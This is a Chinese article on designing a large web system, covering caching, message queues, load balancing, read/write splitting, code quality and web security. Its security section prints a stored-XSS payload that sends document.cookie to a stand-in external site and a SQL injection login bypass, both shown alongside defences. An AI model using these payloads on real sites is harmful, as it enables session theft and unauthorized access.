如何打造一個日均PV千萬級別的大型系統?

skywing 7年前發布 | 40K 次閱讀 數據庫 軟件架構 NOSQL

作者介紹

周金橋, 具有豐富的系統規劃、設計、開發、運維及團隊組織管理工作經驗,熟悉.Net、J2EE技術架構及應用。微軟2008-2012五屆最有價值專家(MVP),2009年單獨著有《ASP.NET夜話》一書,2010年與人合著《程序員的成長之路》。至今活躍在多個技術社區。

本文系作者 原創投稿 ,未經  DBAplus社群  允許,不得擅自轉載和使用。

本文我選定的方向是如何開發一個大型系統,在這里我對大型系統的定義為 日均PV在千萬級 以上,而京東和淘寶這類則屬于巨型系統了。因此在本篇中講述的都是基于一 些開源免費的技術實現,至于通過F5硬件加速、DNS來實現負載均衡、CDN加速等需要花錢購買的技術或者服務則不再本篇介紹范圍之類。

一、從兩個系統說起

1、某移動互聯網公司服務器端架構圖

上圖是某移動互聯網公司的服務器端架構圖,它支撐了國內外數百萬客戶端的訪問請求,有如下特點:

  1. 多層級集群,從Web服務器層、NoSQL層級數據庫層都實現了集群,這樣使得每一層的響應時間大大縮短,從而能夠在單位時間內響應更多請求;

  2. NoSQL應用(Memcached),在NoSQL領域Memcached和Redis都有大量的用戶群,在這個架構里使用的是Memcached。

  3. 數據庫讀寫分離,當前大多數數據庫服務器支持主從機制或訂閱發布機制,這樣一來就為讀寫分離創造了條件,減少了數據庫競爭死鎖出發條件,使響應時間大為縮短(非數據庫集群情況下還可以考慮分庫機制)。

  4. 負載均衡,Nginx實現Web服務器的負載均衡,Memcached自帶負載均衡實現。

2、某公司生產管理系統架構圖

上圖是為某公司的一個分散型系統做的架構設計,這家公司擁有多個跨市、跨省的生產片區,在各片區都有自己的生態車間,各片區與總公司之間通過數據鏈路連接。這個系統的特點是所有的流水線上的產品都貼有唯一的條碼,在生產線的某個操作位操作之前都會掃描貼在產品上的條碼,系統會根據條碼做一些檢查工作,如:產品條碼是否應被使用過(比如之前應發貨給客戶過)、產品是否完成了本道工序之前的全部必須完成工序,如果滿足條件則記錄當前操作工序名稱、操作人、操作時間和操作結果等。

一件產品從上線到完成有數十道工序,而每月下線的產品有少則數十萬、多則數百萬,一個月下來的數據量也是不小的。特別是在跨廠區網絡不穩定的情況下如何保證對生產的影響最小。

本系統架構特點:

  • 所有業務邏輯集中在服務器端,并以Service形式提供,這樣便于業務邏輯調整客戶端能及時得到最新更新;

  • 部署Service的服務器采用集群部署,Nginx實現調度;

  • NoSQL采用了Redis,與Memcached相比,Redis支持的數據類型更多,同時Redis帶有持久化功能,可以將每個條碼對應的產品的最終信息存儲在Redis當中,這樣一般的查詢工作(如條碼是否被使用、產品當前狀態)都可以在Redis中查詢而不是數據庫查詢,這樣大大減輕了數據庫壓力;

  • 數據庫采用了主從機制,實現了讀寫分離,也是為了提高響應速度;

  • 使用了消息隊列MQ和ETL,將一些可以異步處理的動作存放在MQ中,然后由ETL來執行(比如訂單完成后以郵件形式通知相關人員);

  • 實現了系統監控,通過Zabbix來對服務器、應用及網絡關鍵設備實行7×24小時監控,重大異常及時郵件通知IT支持人員。

由于總部其它地方生產規模較小,所以生產分布未采用復雜架構,不過因為從客戶處退回的不良產品都會在總部生產車間進行返修處理,因此總部生產系統需要保存分部生產車間數據,因此分部生產車間數據會同時寫進分部生產數據庫和分部MQ服務器,然后由總部ETL服務器讀取寫入到總部系統中。在分部與總部網絡中斷的情況下分部系統仍可獨立工作,直到網絡恢復。

二、系統質量保證

1、單元測試

單元測試是指對軟件中的最小可測試單元進行檢查和驗證。通常而言,一個單元測試是用于判斷某個特定條件(或者場景)下某個特定函數的行為,常見的開發語言都有對應的單元測試框架,常見的單元測試工具:Junit/Nunit/xUnit.Net/Microsoft.VisualStudio.TestTool

關于單元測試的重要性和如何編寫單元測試用例,在本篇就不詳述了,網上有大量相關的文章。總之,越大型的系統、越重要的系統,單元測試的重要性越大。

針對一些需要外部依賴的單元測試,比如需要Web容器等,可以使用mock測試,Java測試人員可以使用EasyMock這個測試框架,其網址是http://easymock.org/。

2、代碼質量管理平臺

對于多人參與的團隊項目,雖然大多數情況下會有編碼規范拉指導大家如何編寫團隊風格一致的編碼,但不能保證團隊中每個成員、尤其是后期加入的團隊成員仍能按照編碼規范來編寫代碼,因此需要有一個平臺來保證,在這里推薦SonarQube。

SonarQube是一個開源平臺,用于管理源代碼的質量。Sonar不只是一個質量數據報告工具,更是代碼質量管理平臺。支持的語言包括:Java、PHP、C#、C、Cobol、PL/SQL、Flex 等。

主要特點:

  • 代碼覆蓋:通過單元測試,將會顯示哪行代碼被選中

  • 改善編碼規則

  • 搜尋編碼規則:按照名字,插件,激活級別和類別進行查詢

  • 項目搜尋:按照項目的名字進行查詢

  • 對比數據:比較同一張表中的任何測量的趨勢

當然除了代碼質量管理平臺外,還有借助源代碼管理系統,并且在每次提交代碼前進行代碼審核,這樣每次代碼的異動都可以追溯出來。我管理和經歷過的一些重要系統中采用過這樣的做法:除了管理所有程序代碼之外,還將系統中數據庫中的表、視圖、函數及存儲過程的創建都使用源代碼版本管理工具管控起來,而且粒度很小,每個對象的創建都是一個SQL文件。這種方式雖然操作起來有些瑣碎,但對于代碼的變遷追溯非常方便。

三、系統性能保證

1、緩存

所謂緩存就是將一些頻繁使用、但改動相對不平凡的數據保存在內存中,每次更新這些數據的時候同時持久化到數據庫或文件系統,并同步更新到緩存中,查詢的時候盡可能利用緩存。

緩存的實現方法:自定義實現或利用NoSQL。

  • 自定義實現

自定義實現可利用SDK中提供的類,如Dictionary等。

優點:可以局部提高查詢效率;

缺點:不能跨應用、跨服務器,僅限于單個應用;沒有較好緩存生命周期管理策略。

  • NoSQL

Memcached

優點:可以跨應用、跨服務器,有靈活的生命周期管理策略;支持高并發;支持分布式。

缺點:不支持持久化,僅在內存存儲,重啟后數據丟失,需要“熱加載”;僅支持Key/Value。

Redis

優點:可以跨應用、跨服務器,有靈活的生命周期管理策略;支持高并發;支持集群;支持持久化;支持Key/Value、List、Set、Hash數據結構;

以上幾種方法都存在一個特點:需要通過Key去尋找對應的Value、List、Set或Hash。

除了Memcached和Redis之外,還出現了一些NoSQL數據庫和支持NoSQL的數據庫,前者如MongoDB,后者如PostgreSQL(>V9.4),下面是一個MongoDB與PostgreSQL的NoSQL特性的對比:

文檔型NoSQL數據庫的特點:

  • 不定義表結構

即使不定義表結構,也可以像定義了表結構一樣使用,還省去了變更表結構的麻煩。

  • 可以使用復雜的查詢條件 

跟鍵值存儲不同的是,面向文檔的數據庫可以通過復雜的查詢條件來獲取數據,雖然不具備事務處理和Join這些關系型數據庫所具有的處理能力,但初次以外的其他處理基本上都能實現。

NoSQL主要是提高效率,關系數據庫可以保證數據安全;各有使用場景,一般的企業管理系統,沒多少并發量沒必要使用 NoSQL

,互聯網項目或要求并發的

NoSQL

使用比較多,但是最終重要的數據還是要保存到關系數據庫。這也是為什么很多公司會同時使用NoSQL和關系型數據庫的原因。

2、異步

所謂異步就是調用一個方法后并不等該方法執行完畢后再繼續執行后續的操作,而是調用完畢后馬上等待用戶的其它指令。打印機管理程序就是一個異步的例子,某個人可能有幾個數百頁的文檔需要打印,可以在打開一個文檔之后點擊打印,然后繼續打開另一個文檔繼續點打印。盡管打印數百頁文檔需要較長時間,但后續的打印請求會在打印管理程序中排隊,等第一個文檔打印完成后再繼續第二個文檔的打印。

異步有兩個層面:編程語言層面的異步和通過消息隊列等機制實現的異步。

語法層面異步:像Java/C#等大多數語言都支持異步處理。

  • 消息隊列實現異步

用消息隊列實現異步只是消息隊列的一個基本功能之一,消息隊列還具有如下功能:

  • 解耦

  • 靈活性 & 峰值處理能力

  • 可恢復性

  • 送達保證

  • 排序保證

  • 緩沖

  • 理解數據流

  • 異步通信

注: 消息隊列成為在進程或應用之間進行通信的最好形式。消息隊列隊列是創建強大的分布式應用的關鍵。

常用消息隊列有如下,可根據系統特點和運維支持團隊的掌握程度選擇:

  • MSMQ

  • ActiveMQ

  • RabbitMQ

  • ZeroMQ

  • Kafka

  • MetaMQ

  • RocketMQ

3、負載均衡

負載均衡是根據某種負載策略把請求分發到集群中的每一臺服務器上,讓整個服務器群來處理網站的請求。

常見負載均衡方案

Windows負載均衡:NLB

Linux負載均衡:LVS

Web負載均衡:Nginx

硬件級負載均衡:F5

前面幾種都是免費的解決方案,F5作為一種硬件及解決方案在一般企業很少用到。我目前知道的僅有一家世界級飲料公司使用了F5作為負載均衡解決方案,因為這個方案據說相當昂貴。

4、讀寫分離

讀寫分離為了確保數據庫產品的穩定性,很多數據庫擁有雙機熱備功能。

也就是,第一臺數據庫服務器,是對外提供增刪改業務的生產服務器; 第二臺數據庫服務器,主要進行讀的操作。

原理: 讓主數據庫(master)處理事務性增、改、刪操作(INSERT、UPDATE、DELETE),而從數據庫(slave)處理SELECT查詢操作。

一般情況下我們是在代碼中進行處理,但目前也有不少商業中間件形式的讀寫分離中間件,能自動將讀寫數據庫操作調度到不同數據庫上。

在大型系統中,有時候主、從數據庫都是一個集群,這樣可以保證響應速度更快,同時集群中單臺服務器故障也不影響整個系統對外的響應。

四、系統安全性保證

1、XSS攻擊

  • 防范XSS攻擊

XSS攻擊類似于SQL注入攻擊,攻擊之前,我們先找到一個存在XSS漏洞的網站,XSS漏洞分為兩種,一種是DOM Based XSS漏洞,另一種是Stored XSS漏洞。理論上,所有可輸入的地方沒有對輸入數據進行處理的話,都會存在XSS漏洞,漏洞的危害取決于攻擊代碼的威力,攻擊代碼也不局限于script。

  • DOM Based XSS

DOM Based XSS是一種基于網頁DOM結構的攻擊,該攻擊特點是中招的人是少數人。

  • Stored XSS

Stored XSS是存儲式XSS漏洞,由于其攻擊代碼已經存儲到服務器上或者數據庫中,所以受害者是很多人。假如有兩個頁面,一個負責提交內容,一個負責將提交的內容(論壇發帖、讀帖就是這種形式的典型):

提交內容:<script>window.open(“www.b.com?param=”+document.cookie)</script>
頁面內容:<%=request.getParameter("content")%>

這樣用戶在a站提交的東西,在顯示的時候如果不加以處理就會打開b站頁面將相關敏感內容顯示出來。

針對XSS攻擊的防范辦法:

Html encode
特殊字符過濾:<,>

2、SQL注入

  • SQL Injection

所謂SQL注入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用來構造(或者影響)動態SQL命令,或作為存儲過程的輸入參數,這類表單特別容易受到SQL注入式攻擊。

例如我們在登錄一個系統時,在軟件底層按照如下方式查詢數據:

登錄SQL語句: 

SELECT COUNT(*) FROM Login WHERE UserName='admin' AND Password='123456‘
SELECT COUNT(*) FROM Login 
WHERE UserName='admin'– 
Password='123'

針對SQL注入防范辦法:

  • 數據輸入驗證

  • 特殊字符過濾:特殊字符過濾

  • 參數化SQL語句(包括存儲過程)

  • 不使用sa級別賬戶作為連接賬戶或限制連接IP

3、CSRF攻擊

CSRF(Cross-site request forgery)跨站請求偽造,也被稱為“One Click Attack”或者Session Riding,通常縮寫為CSRF或者XSRF,是一種對網站的惡意利用。盡管聽起來像跨站腳本(XSS),但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點內的信任用戶,而CSRF則通過偽裝來自受信任用戶的請求來利用受信任的網站。與XSS攻擊相比,CSRF攻擊往往不大流行(因此對其進行防范的資源也相當稀少)和難以防范,所以被認為比XSS更具危險性。

其核心策略是利用了瀏覽器Cookie或者服務器Session策略,盜取用戶身份。

針對CSRF攻擊防范辦法:

  • 表單Token

  • 驗證碼

  • Referer檢查

  • 關鍵操作身份確認

4、其它攻擊

Error Code:即錯誤代碼回顯,許多Web服務器為調試方便默認顯示詳盡錯誤信息,如錯誤發生的上下文、服務器及應用信息等,容易被惡意利用。

系統或者框架漏洞:如IIS6.0以下版本存在“JPG漏洞”;Apache Struts2服務在開啟動態方法調用任意方法漏洞(CVE-2016-3081);OpenSSL的heartbeat漏洞(CVE-2014-0160);Apache解析漏洞;Nginx(<V0.8.37)空字節代碼執行漏洞;IIS7.0及Nginx(<V0.8.37)畸形解析漏洞;文件上傳漏洞;路徑遍歷漏洞;

防范辦法: 

  • 上傳文件時對MIME進行檢查,必要情況下對上傳文件更名

  • 及時關注安全網站及產品官方網站,發現漏洞及時打補丁

  • 對Web Server運用的用戶角色權限進行限制

  • 使用漏洞掃描工具模擬攻擊

下面是一些我見過的被攻擊后的系統截圖,如下圖是CCTV音樂頻道被攻擊的截圖:

還有本人2008年前后搭建PHPWind運行的畫面:

上圖中是本人2006年前后搭建的一個論壇,有人利用系統漏洞注冊了很多用戶名為空的用戶(其實是身份遺失),,然后又利用這些賬戶在論壇中大量發布廣告、色情等違法違紀的帖子,因為使用了一些不可見字符進行注冊的,在后臺無法管理,最后只好在數據庫中操作管理了。

五、開發相關的經驗教訓

1、應用日志記錄

以前團隊運維著一個老系統,系統中沒有日志功能,而系統的操作人員的計算機水平又較低,每次打電話都是說系統不能用或者是一些根本無法快速定位原因的描述,每次接到求助后需要花費大量時間來分析定位原因,后來將系統中增加了日志功能,并且在網絡狀態連通情況下可自動將錯誤日志以郵件形式發送到負責同事組成的用戶組,自此以后處理這類問題的響應時間大大縮短了,雙方都很滿意。

現在已經有很多開源日志庫,比如.NET的Log4Net,Java的Log4j,可以很輕松地配置啟用日志功能。利用日志組件可以將信息記錄到文件或數據庫,便于發現問題時根據上下文環境發現問題,這一點在調試多線程時尤其重要。

日志級別:FATAL(致命錯誤)、ERROR(一般錯誤)、WARN(警告)、INFO(一般信息)、DEBUG(調試信息)。

注意: 在調試環境中時日志級別盡量低(warn/info),在生產環境中日志級別盡量高(error),且對日志文件大小一定要進行控制。不然也會產生問題。

案例:

某國內有名的管業集團公司的一個系統的重要模塊發生問題,啟用了日志功能以便通過日志組件快速將問題定位并修復。在發布到生產環境時,運行一段時間之后發現程序運行效率相當低下,多位開發人員對模塊代碼進行性能分析未發現問題,大家發現同樣的數據量和操作在生產環境和開發環境效率差巨大,無意中發現生產服務器上日志文件已超過5G!事后發現是由于疏忽未調高日志級別且未對日志進行控制,調整日志模式為按日記錄,問題解除。

參考:《log4net使用詳解》 http://blog.csdn.net/zhoufoxcn/article/details/222053

2、歷史記錄追蹤

  • 代碼管控

盡可能使用代碼管控工具對源代碼進行管控,如SVN/TFS/Git,如果有可能不但管控程序代碼,還要管控數據庫相關的SQL文件(包括初始化腳本及存儲過程和使用ORM框架中的Mapping文件),做到系統的一切變動皆有記錄。

  • 代碼審核

任何人提交代碼都必須本人本地編譯、調試無誤后,再有人review后方可提交,且針對bug修復的提交需注明所修復的bug信息。

  • Bug記錄

通過Bug記錄系統記錄整個bug的生命周期,包括發現、修復、關閉。TFS本身支持bug記錄,開源系統中禪道也是一個不錯的Bug記錄工具。

六、總結

本篇主要是就系統從開發到最終部署運維過程中常用的技術、框架和方法做了一個總結,當然以上經驗總結來源于本人從業以來所經歷的項目中的經驗和教訓,可能還有更好更完美的方案,在此權當拋磚引玉。

 

來自:https://mp.weixin.qq.com/s/TYLxcCfkNe7JOMp_xHgtIQ

 

 本文由用戶 skywing 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
 轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
 本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!